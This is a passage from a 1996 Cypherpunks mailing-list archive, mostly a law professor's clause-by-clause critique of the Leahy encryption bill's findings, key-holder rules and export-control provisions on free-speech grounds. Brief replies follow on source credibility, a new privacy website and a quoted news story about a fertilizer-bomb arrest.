     of computing and electronic networking offers tremendous potential
     benefits to the way Americans live, work, and are entertained, but
     also raises new threats to the privacy of American citizens and the
     competitiveness of American businesses;

Notice that there is nothing here---at least not directly---about the
freedom to distribute and to obtain access to information and that,
therefore, there is no mention of the constitutional right to speak
and publish information about cryptography.

     (2) a secure, private, and trusted national and global information
     infrastructure is essential to promote economic growth, protect
     citizens' privacy, and meet the needs of American citizens and
     businesses.

Once again, there is nothing about the freedom to distribute and
obtain access to information.

     (3) the rights of Americans to the privacy and security of their
     communications and in conducting their personal and business affairs
     should be preserved and protected;

I like this one.

     (4) the authority and ability of investigative and law enforcement
     officers to access and decipher, in a timely manner and as provided
     by law, wire and electronic communications necessary to provide for
     public safety and national security should also be preserved;

This is presumably included as a political compromise.  Those whose
concerns are primarily with marketing software can probably live with
it.  Those who are concerned with privacy and liberty and human
decency should, on the other hand, find this finding terrifying.  (Of
course, one can argue that the findings are just window dressing
without any substantive significance; I assure you, however, that they
can be used to interpret the substantive provisions of the statute and
that ultimately the interpretation is more important than the words of
the statute itself.)

     (5) individuals will not entrust their sensitive personal, medical,
     financial, and other information to computers and computer networks
     unless the security and privacy of that information is assured;

I have no problem with this as a finding, though I am not sure that I
want to encourage people to entrust sensitive information to computers
and computer networks, no matter what assurances they may be given.

     (6) business will not entrust their proprietary and sensitive
     corporate information, including information about products,
     processes, customers, finances, and employees, to computers and
     computer networks unless the security and privacy of that
     information is assured;

No problem.

     (7) encryption technology can enhance the privacy, security,
     confidentiality, integrity, and authenticity of wire and electronic
     communications and stored electronic information;

That is correct.

     (8) encryption techniques, technology, programs, and products are
     widely available worldwide;

Yep.

     (9) Americans should be free lawfully to use whatever particular
     encryption techniques, technologies, programs, or products developed
     in the marketplace they desire in order to interact electronically
     worldwide in a secure, private, and confidential manner;

The clumsiness of the language worries me.  That word ``lawfully'' may
just mean that Congress finds that people should be free to do
whatever the law allows, but that there are no restrictions on what
the law may forbid.

More troublesome is the reference to programs ``developed in the
market place''.  That might be read as suggesting that there is no
freedom to use products that were not developed in the market place.
(The small number of programs that I have written have all been
developed in my head, and in my head's extension, my computer; none of
them had anything to do with the market place.  Are the programs
produced by the Free Software Foundation produced in the market place?)

     (10) American companies should be free to compete and to sell
     encryption technology, programs, and products;

I have no objection to this finding, but notice that it has nothing to
do with the free speech issues that are my concerns.  I want to be
able to give away the programs that I have written, and to give away
encryption technology, programs, and products that are subject to
copylefts or are otherwise available.  And I want to be able to
explain to my law students about how encryption programs work and why
they may be ethically required to use them for electronic
communications with their clients (and where to get them).

     (11) there is a need to develop a national encryption policy that
     advances the development of the national and global information
     infrastructure, and preserves Americans' right to privacy and the
     Nation's public safety and national security;

I don't really object to this, but I suspect that the best policy
would be no policy.  There are powers within the government who would
use the reference to ``the Nation's public safety and national
security'' as a basis for continuing to restrict the export or
publication or other disclosure of any secure cryptographic software
and algorithms.

     (12) there is a need to clarify the legal rights and
     responsibilities of key holders who are voluntarily entrusted with
     the means to decrypt wire or electronic communications;

I am not sure that this would not best be left to private agreements
between the owners of the keys and their holders.  (But this is not in
the area of my concern.)

     (13) the Congress and the American people have recognized the need
     to balance the right to privacy and the protection of the public
     safety and national security;

This is most unfortunate.  In cases of extreem danger the courts may
allow the agents of the state to ignore the constitutional right of
privacy, but it is not a matter of ``balancing'' equally protected
interests.  The agents of the state always claim that they are acting
in order to protect public safety and national security, especially
when they are trying to destroy the safety of the constitution.  

     (14) the Congress has permitted lawful electronic surveillance by
     investigative or law enforcement officers only upon compliance with
     stringent statutory standards and procedures; and

I guess I don't object to this, except that I am not sure that it is
true.

     (15) there is a need to clarify the standards and procedures by
     which investigative or law enforcement officers obtain assistance
     from key holders who are voluntarily entrusted with the means to
     decrypt wire or electronic communications, including such
     communications in electronic storage.

This seems confused; what about encrypted data that is not a communication?

   SEC. 4. FREEDOM TO USE ENCRYPTION.

   (a) LAWFUL USE OF ENCRYPTION.-It shall be lawful for any person within
   any State of the United States, the District of Columbia, the
   Commonwealth of Puerto Rico, and any territory or possession of the
   United States, and by United States persons in a foreign country to
   use any encryption, regardless of encryption algorithm selected,
   encryption key length chosen, or implementation technique or medium
   used except as provided in this Act and the amendments made by this
   Act or in any other law.

This only says it is lawful to use encryption unless there is a law
forbidding it.  I hardly find that helpful.

   (b) GENERAL CONSTRUCTION.-Nothing in this Act or the amendments made
   by this Act shall be construed to-

     (1) require the use by any person of any form of encryption;

OK, but shouldn't it also cover requiring any person _not_ to use any
form of encryption?

     (2) limit or affect the ability of any person to use encryption
     without a key escrow function; or

OK, though the language is rather clumsy.

     (3) limit or affect the ability of any person who chooses to use
     encryption with a key escrow function not to use a key holder.

   SEC. 5. ENCRYPTED WIRE AND ELECTRONIC COMMUNICATIONS.

   (a) IN GENERAL.-Part I of title 18, United States Code, is amended by
   inserting after chapter 121 the following new chapter:

   "CHAPTER 122-ENCRYPTED WIRE AND ELECTRONIC COMMUNICATIONS

   "2801. Definitions.
   "2802. Prohibited acts by key holders.
   "2803. Reporting requirements.
   "2804. Unlawful use of encryption to obstruct justice.
   "2805. Freedom to sell encryption products.



These provisions are not my major concern at this time, but note that
``encryption'' by definition only applies to wire and electronic
communications.  It thus seems that these provisions have nothing to
do with data that is encrypted but that is not a communication.

Do you think that this was what was intended?


   "\S 2801. Definitions

     "As used in this chapter-
     "(1) the terms 'person', 'State', 'wire communication', 'electronic
     communication', 'investigative or law enforcement officer', 'judge
     of competent jurisdiction', and 'electronic storage' have the same
     meanings given such terms in section 2510 of this title;
     "(2) the term 'encryption' means the scrambling of wire or
     electronic communications using mathematical formulas or algorithms
     in order to preserve the confidentiality, integrity or authenticity
     and prevent unauthorized recipients from accessing or altering such
     communications;
     "(3) the term 'key holder' means a person located within the United
     States (which may, but is not required to, be a Federal agency) who
     is voluntarily entrusted by another independent person with the
     means to decrypt that person's wire or electronic communications for
     the purpose of subsequent decryption of such communications;
     "(4) the term 'decryption key' means the variable information used
     in a mathematical formula, code, or algorithm, or any component
     thereof, used to decrypt wire or electronic communications that have
     been encrypted; and
     "(5) the term 'decryption assistance' means providing access, to the
     extent possible, to the plain text of encrypted wire or electronic
     communications.


   "\S 2802. Prohibited acts by key holders

   "(a) UNAUTHORIZED RELEASE OF KEY.-Except as provided in subsection
   (b), any key holder who releases a decryption key or provides
   decryption assistance shall be subject to the criminal penalties
   provided in subsection (e) and to civil liability as provided in
   subsection (f).
   "(b) AUTHORIZED RELEASE OF KEY.-A key holder shall only release a
   decryption key in its possession or control or provide decryption
   assistance-
     "(1) with the lawful consent of the person whose key is being held
     or managed by the key holder;
     "(2) as may be necessarily incident to the holding or management of
     the key by the key holder; or
     "(3) to investigative or law enforcement officers authorized by law
     to intercept wire or electronic communications under chapter 119, to
     obtain access to stored wire and electronic communications and
     transactional records under chapter 121, or to conduct electronic
     surveillance, as defined in section 101 of the Foreign Intelligence
     Surveillance Act of 1978 (50 U.S.C. 1801), upon compliance with
     subsection (c) of this section.

Except for subdivision (3) this seems totally unnecessary.  Let the
parties agree to any arrangement they want.  (And anyone who is
seriously going to use an outside key holder is going to want to have
them bonded, and will look to the bonding company for protection.
(Bonding companies are mean.))

    "(c) REQUIREMENTS FOR RELEASE OF DECRYPTION KEY TO INVESTIGATIVE; OR
   LAW ENFORCEMENT OFFICER.-

     "(1) CONTENTS OF WIRE AND ELECTRONIC COMMUNICATIONS.-A key holder is
     authorized to release a decryption key or provide decryption
     assistance to an investigative or law enforcement officer authorized
     by law to conduct electronic surveillance under chapter 119, only
     if-
     "(A) the key holder is given- "(i) a court order signed by a judge
     of competent jurisdiction directing such release or assistance; or
     "(ii) a certification in writing by a person specified in section
     2518(7) or the Attorney General stating that- "(I) no warrant or
     court order is required by law;
     "(II) all requirements under section 2518(7) have been met; and
     "(III) the specified release or assistance is required;
     "(B) the order or certification under paragraph (A)-
     "(i) specifies the decryption key or decryption assistance which is
     being sought; and
     "(ii) identifies the termination date of the period for which
     release or assistance has been authorized; and"(C) in compliance
     with an order or certification under subparagraph (A), the key
     holder shall provide only such key release or decryption assistance
     as is necessary for access to communications covered by subparagraph
     (B). "(2) STORED WIRE AND ELECTRONIC COMMUNICATIONS.-(A) A key
     holder is authorized to release a decryption key or provide
     decryption assistance to an investigative or law enforcement officer
     authorized by law to obtain access to stored wire and electronic
     communications and transactional records under chapter 121, only if
     the key holder is directed to give such assistance pursuant to the
     same lawful process (court warrant, order, subpoena, or
     certification) used to obtain access to the stored wire and
     electronic communications and transactional records.
     "(B) The notification required under section 2703(b) shall, in the
     event that encrypted wire or electronic communications were obtained
     from electronic storage, include notice of the fact that a key to
     such communications was or was not released or decryption assistance
     was or was not provided by a key holder.
     "(C) In compliance with the lawful process under subparagraph (A),
     the key holder shall provide only such key release or decryption
     assistance as is necessary for access to the communications covered
     by such lawful process.

Note once again that this applies only to _communications_.

     "(3) USE OF KEY.-(A) An investigative or law enforcement officer to
     whom a key has been released under this subsection may use the key
     only in the manner and for the purpose and duration that is
     expressly provided for in the court order or other provision of law
     authorizing such release and use, not to exceed the duration of the
     electronic surveillance for which the key was released.
     "(B) On or before completion of the authorized release period, the
     investigative or law enforcement officer to whom a key has been
     released shall destroy and not retain the released key.
     "(C) The inventory required to be served pursuant to section
     2518(8)(d) on persons named in the order or the application under
     section 2518(7)(b), and such other parties to intercepted
     communications as the judge may determine, in the interest of
     justice, shall, in the event that encrypted wire or electronic
     communications were intercepted, include notice of the fact that
     during the period of the order or extensions thereof a key to, or
     decryption assistance for, any encrypted wire or electronic
     communications of the person or party intercepted was or was not
     provided by a key holder.

     "(4) NONDISCLOSURE OF RELEASE.-No key holder, officer, employee, or
     agent thereof shall disclose the key release or provision of
     decryption assistance pursuant to subsection (b), except as may
     otherwise be required by legal process and then only after prior
     notification to the Attorney General or to the principal prosecuting
     attorney of a State or any political subdivision of a State, as may
     be appropriate.

   "(d) RECORDS OR OTHER INFORMATION HELD BY KEY HOLDERS.-A key holder,
   shall not disclose a record or other information (not including the
   key) pertaining to any person whose key is being held or managed by
   the key holder, except-

     "(1) with the lawful consent of the person whose key is being held
     or managed by the key holder; or
     "(2) to an investigative or law enforcement officer pursuant to a
     subpoena authorized under Federal or State law, court order, or
     lawful process.

   An investigative or law enforcement officer receiving a record or
   information under paragraph (2) is not required to provide notice to
   the person to whom the record or information pertains. Any disclosure
   in violation of this subsection shall render the person committing the
   violation liable for the civil damages provided for in subsection (f).


   "(e) CRIMINAL PENALTIES.-The punishment for an offense under
   subsection (a) of this section is-

     "(1) if the offense is committed for a tortious, malicious, or
     illegal purpose, or for purposes of direct or indirect commercial
     advantage or private commercial gain- "(A) a fine under this title
     or imprisonment for not more than 1 year, or both, in the case of a
     first offense under this subparagraph; or
     "(B) a fine under this title or imprisonment for not more than 2
     years, or both, for any second or subsequent offense; and"(2) in any
     other case where the offense is committed recklessly or
     intentionally, a fine of not more than $5,000 or imprisonment for
     not more than 6 months, or both.

   "(f) CIVIL DAMAGES.-

     "(1) IN GENERAL.-Any person aggrieved by any act of a person in
     violation of subsections (a) or (d) may in a civil action recover
     from such person appropriate relief.
     "(2) RELIEF.-In an action under this subsection, appropriate relief
     includes- "(A) such preliminary and other equitable or declaratory
     relief as may be appropriate;
     "(B) damages under paragraph (3) and punitive damages in appropriate
     cases; and
     "(C) a reasonable attorney's fee and other litigation costs
     reasonably incurred."(3) COMPUTATION OF DAMAGES.-The court may
     assess as damages whichever is the greater of-
     "(A) the sum of the actual damages suffered by the plaintiff and any
     profits made by the violator as a result of the violation; or
     "(B) statutory damages in the amount of $5,000."(4) LIMITATION.-A
     civil action under this subsection shall not be commenced later than
     2 years after the date upon which the plaintiff first knew or should
     have known of the violation.

   "(g) DEFENSE.-It shall be a complete defense against any civil or
   criminal action brought under this chapter that the defendant acted in
   good faith reliance upon a court warrant or order, grand jury or trial
   subpoena, or statutory authorization.

   "\S 2803. Reporting requirements

   "(a) IN GENERAL.-In reporting to the Administrative Office of the
   United States Courts as required under section 2519(2) of this title,
   the Attorney General, an Assistant Attorney General specially
   designated by the Attorney General, the principal prosecuting attorney
   of a State, or the principal prosecuting attorney of any political sub
   division of a State, shall report on the number of orders and
   extensions served on key holders to obtain access to decryption keys
   or decryption assistance.
   "(b) REQUIREMENTS.-The Director of the Administrative Office of the
   United States Courts shall include as part of the report transmitted
   to the Congress under section 2519(3) of this title, the number of
   orders and extensions served on key holders to obtain access to
   decryption keys or decryption assistance and the offenses for which
   the orders were obtained.

   "\S 2804. Unlawful use of encryption to obstruct justice

   "Whoever willfully endeavors by means of encryption to obstruct,
   impede, or prevent the communication of information in furtherance to
   a felony which may be prosecuted in a court of the United States, to
   an investigative or law enforcement officer shall-

     "(1) in the case of a first conviction, be sentenced to imprisonment
     for not more than 5 years, fined under this title, or both; or
     "(2) in the case of a second or subsequent conviction, be sentenced
     to imprisonment for not more than 10 years, fined under this title,
     or both.

This provision is completely incoherent.  There is no telling how the
government will interpret it, but at a guess they will use it to make
people reveal their keys:  ``if you don't tell us your key, we are
going to charge you with impeding the communication to me of
information about the felony I am investigating.''

   "§ 2805. Freedom to sell encryption products

   "(a) IN GENERAL.-It shall be lawful for any person within any State of
   the United States, the District of Columbia, the Commonwealth of
   Puerto Rico, and any territory or possession of the United States, to
   sell in interstate commerce any encryption, regardless of encryption
   algorithm selected, encryption key length chosen, or implementation
   technique or medium used.

This sounds nice, but remember that ``encryption'' is defined as:
``the scrambling of wire or electronic communications using
mathematical formulas or algorithms in order to preserve the
confidentiality, integrity or authenticity and prevent unauthorized
recipients from accessing or altering such communications''. So what
does it mean to sell ``any encryption''?

   "(b) CONTROL OF EXPORTS BY SECRETARY OF COMMERCE.-

     "(1) GENERAL RULE.-Notwithstanding any other law, subject to
     paragraphs (2), (3), and (4), the Secretary of Commerce shall have
     exclusive authority to control exports of all computer hardware,
     software, and technology for information security (including
     encryption), except computer hardware, software, and technology that
     is specifically designed or modified for military use, including
     command, control, and intelligence applications.

OK, here is where the problems that concern me arise.

This provision sounds quite nice, but it covers up several big
problems.

In the first place, the delegation to the Secretary of Commerce sounds
like a good idea, because, at the present time the people in the
Commerce department who enforce export controls are very nice and
helpful, and operate reasonably under reasonable regulations, while
the puppets who front for the NSA (or are actually agents of the NSA)
in the Office of Defense Trade Controls are not very nice, are
exceptionally unhelpful, and specialize in unreasonable---and down
right irrational---interpretations of unreasonable regulations.  But
if the jurisdiction is handed over to Commerce, I predict that the the
puppet masters will turn their attention to Commerce, and shortly
thereafter---if only because of Presidential pressure---Commerce will
have its own incoherent regulations and its own unpleasent people and
it won't be as easy to export software as one might hope.  

Note that the transfer is to Commerce but there is nothing that
expressly specifies what law is to be applied by Commerce.  Thus in
theory at least there is nothing to stop Commerce from enforcing the
same old provisions of the ITAR

>From the point of view of one who is concerned with first amendment
rights rather than selling cryptographic software as a commodity, the
really unfortunate part is that this provision authorizes export
contols on ``software''.  Now the Leahy bill does not define software,
but there is a definition of lying around in the International Traffic
in Arms Regulations (``ITAR'') that I fear Commerce might adopt---it
may even be the language that the draftsmen of the Leahy bill had in
mind.  And this definition of ``software'' includes a great deal of
material that cannot constitutionally be controlled.  Here is that
definition from the ITAR \S 121,8(f): ``Software includes but is not
limited to the system functional design, logic flow, algorithms,
application programs, operating systems and support software for
design, implementation, test, operation, diagnosis and repair.''

Note that what is covered here is nothing but information, and that
that information includes algorithms, _i.e._ recipes.  If the
government can constitutionally ``control'' the ``export'' of
cryptographic algorithms by requiring a license before one can publish
them or otherwise disclose them to a foreign person, then they can
require a license before one publishes Julia Child's recipe for a
_bombe surprise_ or a recipe for winning a Presidential election
without actually committing any felonies.

Even if that definition is adopted, the fact remains that software is
still nothing but information, and that it is the communication of
information that is protectected by the first amendment to the United
States constitution.  (If you aren't convinced that software is
protected by the first amendment, notice that software is
copyrightable as a ``literary work''.)  Note that the paradigmatic
violation of the first amendment is a scheme under which the
government requires publishers to obtain a license before publishing.

Part of what I fear is that, were the Leahy bill to be passed in its
present form is that the President, in conformance with that bill,
would simply transfer the licensing and rule making powers with
respect to cryptographic devices and software to the Department of
Commerce, but would still leave them controlled by the ITAR and the
Arms Export Control Act just as they are now, including all of the
cryptic and unconstitional interpretations of ITAR that up to now have
been imposed upon the Office of Defense Trade Controls by the National
Security Agency.  There is nothing in the Leahy bill that forbids that
sort of shell game.  The trouble is that there is nothing in the bill
that specifies the law under which Commerce is to ``control''
cryptographic devices and software.

The real problem, however, is simply that the Leahy bill appears to
authorize control (including licensing) of cryptographic software and
thus to authorize the imposition of licensing requirements for the
constitutionally protected communication of information.  At the
present time, on the other hand, although the Arms Export Control Act
does, quite constitutionally, require licensing of physical devices,
the provisions in the ITAR requiring licenses for the communication of
information are not authorized by any act of congress.  (The point is
of practical importance because the courts may be willing to strike
down the ITAR's licensing requirements on software on the grounds that
they are _ultra vires_ simply to avoid having to decide the
constitutional issues.)

Thus the major problem with the Leahy bill, from the point of view of
those concerned with the freedoms of speech and of the press, is that
it conflates hardware, which can be regulated constitutionally, with
software, which is text that cannot be constitutionally regulated, and
certainly cannot be subjected to a licensing scheme.  (The agents of
the NSA in the Office of Defense Trade Controls try to confuse this
distinction, claiming that cryptographic software is hardware, not
information that is in the public domain under the provisions of the
ITAR.)

The only satisfactory bill, from the point of view of those of us who
are concerned with freedom of speech and of the press would be a bill
that says that export licensing controls do not apply, and recognizes
that export controls cannot be applied constitutionally, to the
publication or other disclosure or communication of software.

Another problem is that the Leahy bill expressly does not apply to
``computer hardware, software, and technology that is _specifically
designed or modified for military use_, including command, control,
and intelligence applications''.  

This may sound harmless, but the emphasized language is almost exactly
the language that is used in the ITAR to define what can be included
on the United States Munition List in the ITAR.  The major
prerequisite for the designation of an article or service on the
United States Munitions List, according to ITAR \S 120.3, is that it
is: ``specifically designed, developed, configured, adapted, or
modified for a military application''.  

This strongly suggests that, if the Leahy bill were adopted, the NSA
and the Office of Defense Trade Controls would simply take the
position that cryptographic devices and software still are
specifically designed for military use and thus remain on the
Munitions List and under the control of the Office of Defense Trade
Controls in the State Department.  This would seem to inconsistent
with the intent of the Leah bill, but that is hardly going to bother
the rather spooky people in the Office of Defense Trade Controls since
the law expressly provides that the courts may not review the
designation of an item on the United States Munitions List.  (Even
before that provision forbidding judicial review was adopted, one
federal district court held that the defendant in a criminal
case---whose alleged crime was exporting cable or satellite TV
descrambler boxes---could not challenge the inclusion of descramblers
on the Munitions List, because their inclusion was an unreviewable
``political'' determination.)

Thus I predict that the passage of the Leahy amendment would have no
affect whatsoever on the licensing requirements that are presently
applied by the Office of Defense Trade Controls to cryptographic
devices and software.  The people who enforce those requirements are
not now governed by law or logic; the Leahy bill is not likely to
change that, not when it contains such a gaping loophole.

But let us look at the particular provisions of the Leahy bill that
will supposedly ease the burden on both cryptographic hardware and
software: 

     "(2) ITEMS NOT REQUIRING LICENSES.-No validated license may be
     required, except pursuant to the Trading With The Enemy Act or the
     International Emergency Economic Powers Act (but only to the extent
     that the authority of such Act is not exercised to extend controls
     imposed under this Act), for the export or reexport of- 

``Validated license'' is a term that is not used in the Arms Export
Control Act and the ITAR, so to the extent that that act and those
regulations remain applicable to cryptographic devices and
software---and, as has been pointed out, nothing in the Leahy bill
purports to change that---, this provision will have no affect
whatsoever.

On the other hand, the term ``validated license'' is used in the
regulations of the Bureau of Export Administration of the Department
of Commerce.  Thus 15 Code of Federal Regulations \S 770.2 defines
``Validated license'' as: ``A document issued by or under the
authority of the Bureau of Export Administration, authorizing
export.''  So perhaps this provision of the Leahy bill does give some
protection, but only if the powers of the Commerce Department to
regulate software are deligated to Commerce's Bureau of Export
Administration and even then only if this definition is not amended.


It would, moreover, have been preferable if the bill had provided that
cryptographic hardware and software are entitled to a ``general
license'', which is defined in 15 CFR \S 770.2 as follows: ``A license
established by the U.S. Department of Commerce for which no
application is required and for which no document is granted or
issued. It is available for use by all persons, except those listed in
and prohibited by the provisions of Supplement No. 1 to part 788, and
permits export within the provisions thereof as prescribed in the
Export Administration Regulations. These general licenses are not
applicable to exports under the licensing jurisdiction of agencies
other than the Department of Commerce.''  (But note the last
provision.)

     "(A) any software, including software with encryption
     capabilities, that is-
     "(i) generally available, as is, and designed for installation by
     the purchaser; or
     "(ii) in the public domain or publicly available because it is
     generally accessible to the interested public in any form; or
     "(B) any computing device solely because it incorporates or employs in 
     any form software (including software with encryption capabilities)
     exempted from any requirement for a validated license under
     subparagraph (A). 

This provision at first glance looks pretty good, but it arguably
offers no protection to people like Daniel Bernstein and myself who
want to publish new (even if, as is ture in my case, also trivial)
software with encryption capabilities.  The ITAR also has a public
domain exemption, but the censors in the Office of Defense Trade
Controls take the position that one would violate the ITAR by the act
of putting matter in the public domain or making it generally
available.  (The Office of Defense Trade Controls also takes the
position that cryptographic software is not information that can fall
within the public domain exception in the ITAR.)

Note that though no validated license can be required for such
software and related hardware under the Leahy bill, there is nothing
that says that such software and hardware is entitled to a general
license.  One may thus find oneself in the situation---that happened
for example to Daniel Bernstein under the ITAR---that one has written
software that cannot be exported without a license, but for which no
possible license is available.

     "(3) SOFTWARE WITH ENCRYPTION CAPABILITIES.-The
     Secretary of Commerce shall authorize the export or reexport of
     software with encryption capabilities for nonmilitary end-uses in
     any country to which exports of software of similar capability are
     permitted for use by financial institutions not controlled in fact
     by United States persons, unless there is substantial evidence that
     such software will be- 
     "(A) diverted to a military end-use or an end-use supporting 
     international terrorism;
     "(B) modified for military or terrorist end-use; or
     "(C) reexported without requisite United States authorization.

Here we see what appears to be authority for the Secretary of Commerce
to regulate the export of software, a provision that probably violates
the first amendment of the United States constitution, unless the
definition of ``export or rexport of software'' is limited in a manner
that would make the regulation quite ineffective.  The Leahy bill,
however, makes no effort to define what is an ``export'' of software.
One thus has reason to fear that the Secretary of Commerce will simply
adopt the definitions which have been used to restrain the publication
or other disclosure of cryptographic software under the ITAR.  


     "(4) HARDWARE WITH ENCRYPTION CAPABILITIES.-The Secretary shall 
     authorize the export or reexport of computer hardware with encryption
     capabilities if the Secretary determines that a product offering
     comparable security is commercially available from a foreign
     supplier without effective restrictions outside the United States.

This applies only to hardware, and so is not subject to attack on
first amendment grounds.  I am willing to bet, however, that if this
provision is passed, the National Security Agency would be delegated
the job of determing whether products of comparable security are
available outside the United States and that very few products would
be found by the NSA to be comparable (and that it would take years to
get a determination of any sort).

     "(5) DEFINITIONS.-As used in this subsection- 
     "(A) the term 'generally available' means, in the case of
     software (including software with encryption capabilities),
     software that is widely offered for sale, license, or transfer
     including, but not limited to, over-the-counter retail sales,
     mail order transactions, phone order transactions, electronic
     distribution, or sale on approval;

Notice that this gives no protection to those who do not widely offer
their software for sale, license, or transfer---persons like Daniel
Bernstein and almost all academic cryptographers, for example.  Those
who are interested in mass marketing cryptographic software may be
happy with this provision, but it is no consolation to those of us who
are not mass marketers.  (Note that mass marketed software may be
entitled to less constitutional protection, as commercial speech, than
is the software that academics like Dan Bernstein or myself may desire
to publish as part of our research or educational activities.)

     "(B) the term 'as is' means, in the case of software (including
     software with encryption capabilities), a software program that is
     not designed, developed, or tailored by the software company for
     specific purchasers, except that such purchasers may supply certain
     installation parameters needed by the software program to function
     properly with the purchaser's system and may customize the software
     program by choosing among options contained in the software program;
     "(C) the term 'is designed for installation by the purchaser' means,
     in the case of software (including software with encryption
     capabilities)- 
     "(i) the software company intends for the purchaser
     (including any licensee or transferee), who may not be the actual
     program user, to install the software program on a computing device
     and has supplied the necessary instructions to do so, except that
     the company may also provide telephone help-line services for
     software installation, electronic transmission, or basic operations;
     and
     "(ii) that the software program is designed for installation by the
     purchaser without further substantial support by the supplier;

Note that those of us who are not a ``software company'' that sells
software to a ``purchaser'' are apparently excluded from the benefits
of this definition.

     "(D) the term 'computing device' means a device which
     incorporates one or more microprocessor-based central processing
     units that can accept, store, process, or provide output of data; and
     "(E) the term 'computer hardware', when used in conjunction with
     information security, includes, but is not limited to, computer
     systems, equipment, application-specific assemblies, modules, and
     integrated circuits.".


I do not have any comments on the remaining portions of the bill, and
so I have deleted them from this already too lengthy submission.

I look forward to your reactions and corrections.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Mar 1996 04:19:57 +0800
To: jamesd@echeque.com
Subject: Re: rhetorical trickery
In-Reply-To: <199603110412.UAA13426@dns1.noc.best.net>
Message-ID: <199603111727.MAA00641@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@echeque.com writes:
> At 02:36 PM 3/10/96 -0500, Mark M. wrote:
> > There was an article in the July 1995 issue of Technology Review by
> > Dorothy Denning explaining the "evils of encryption" in defense of the
> > Clipper Chip which mentions this case.  I suspect that it actually
> > happened.
> 
> Why should the fact that Dorothy Denning says something lead you to 
> suspect that it actually happened?

Denning has happily talked about snuff films in the past. James is
dead on that Denning is not a credible source.

On the other hand, Phil Zimermann has personally told me of a case in
which the police had trouble with a child molester using PGP in the
stated manner. He is a credible source for this.

Let us remember that just as murderers can use perfectly useful
household knives to do their evil deeds, and we should not therefore
ban cooking utensils, so it is to be expected that privacy tools would
be used sometimes for evil as well as for good. A free society does
not ban cars because they can be used to run people down, and does not
ban PGP just because on rare occassions it is used to conceal the
diary of a child molester.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 12 Mar 1996 07:22:32 +0800
To: cypherpunks@toad.com
Subject: shellback.com online
Message-ID: <2.2.32.19960311064735.00682e48@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just a short note to let everyone know that shellback.com is, in fact, online: http://www.shellback.com

Note that our domain name arrived in time; none of that IP address stuff needed.

It ain't much, but it's mine (and my partners). I'd appreciate any feedback folks might have about our links to privacy/crypto sites.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUOwRMVrTvyYOzAZAQEZrgP/arTmLrZwjHg9u/KLvyie86vwIleiCz6g
xTl54ygZBn4DrmqtvvdKZ8K/ysT9jY9iCFymAell5PS/sMnL1UNFtNw4Sl2t4kOo
E6us2f1hpThIMCG6w+6zBJhqWEhI7YqQAKLlIXP8+8BUsyM8hEy7NykCMlrZT/+B
kvNXHnH8tW0=
=cRL7
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Silcock, Stephen" <SilcocSM@tbacrm001.prose.dpi.qld.gov.au>
Date: Tue, 12 Mar 1996 01:41:26 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Fertilizer & fuel oil as cause for suspicion - similar to cryptography?
Message-ID: <3144AEFF@inferno.ind.dpi.qld.gov.au>
MIME-Version: 1.0
Content-Type: text/plain



On Friday 8th March Allen wrote:

<quote>
        In the below article, the cops seem to be claiming that fuel oil,
fertilizer, and bomb-making knowledge = illegal explosives possession. This
idea doesn't make sense.
        Crypto relevance? An example of how governmental idiots are likely 
to
take cryptography.
        -Allen

 -----------------
      Copyright &copy 1996 Nando.net
      Copyright &copy 1996 The Associated Press

   CORVALLIS, Ore. (Mar 8, 1996 11:09 a.m. EST) -- Ingredients for a
   fertilizer bomb like the one that killed 169 people in Oklahoma City
   were found on a farm along with bomb-making instructions, guns and
   drugs, police said.

   Four people were arrested on weapons and drug charges. Charges
   involving illegal explosives were expected to be filed later, police
   Sgt. Dennis Carson said Thursday.

   Officers seized a large quantity of fuel oil and the fertilizer
   ammonium nitrate, two key ingredients in the April 19 Oklahoma City
   bombing.

   "My understanding is it could have made a large bomb and a rather
   large explosion had it been detonated," Carson said. "All they had to
   do was mix the parts. It would take just a few minutes."

   He wouldn't say how much fertilizer was found in the raid Wednesday
   night near this city about 80 miles south of Portland. The fertilizer,
   found in an 8,000-square-foot barn, was removed in a state police
   bomb-squad truck.

   Carson said investigators were trying to determine whether those
   arrested had plans to bomb a building or had ties to any
   anti-government groups.

   The federal Bureau of Alcohol Tobacco and Firearms is investigating.

   Along with the material for the fertilizer bomb, officers found 29
   guns, including eight assault rifles, and material to make pipe bombs.
   Three ounces of marijuana and some methamphetamine were also found.

[...]

   All were charged with drug possession and Luehring and the younger
   Bradley were also charged with being ex-convicts in possession of
   weapons.

   Carson didn't have details on their criminal past.

[...]

<unquote>

     I would be the first to admit that fertilizer and petrol are freely 
available and quite possibly innocent enough, but when the people involved 
are ex-convicts also in possession (apparently illegally; I don't know US 
law that well) of TWENTY-NINE firearms including EIGHT ASSAULT RIFLES, then 
I think police concern is quite reasonably warranted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 01:25:58 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Leahy and Mrs. Bemmis (now that's a subject line)
Message-ID: <m0twEkp-00091lC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM 3/11/96 -0500, A. Padgett Peterson P.E. Information Security wrote:

>The Leahy bill is flawed in two areas. Sent a message with proposed wording
>to Sen. Leahy via his web page but have not gotten a response. Have a bad
>habit of reading laws without thought since this is how LEA and prosecutors
>are told to enforce them - as written, not as believed. If an area is
>vague, a court is required to decide how to interpret it, not LEA. If badly
>written *everyone* loses.

Unfortunately, this is not the way CREATIVE prosecutors enforce laws.  
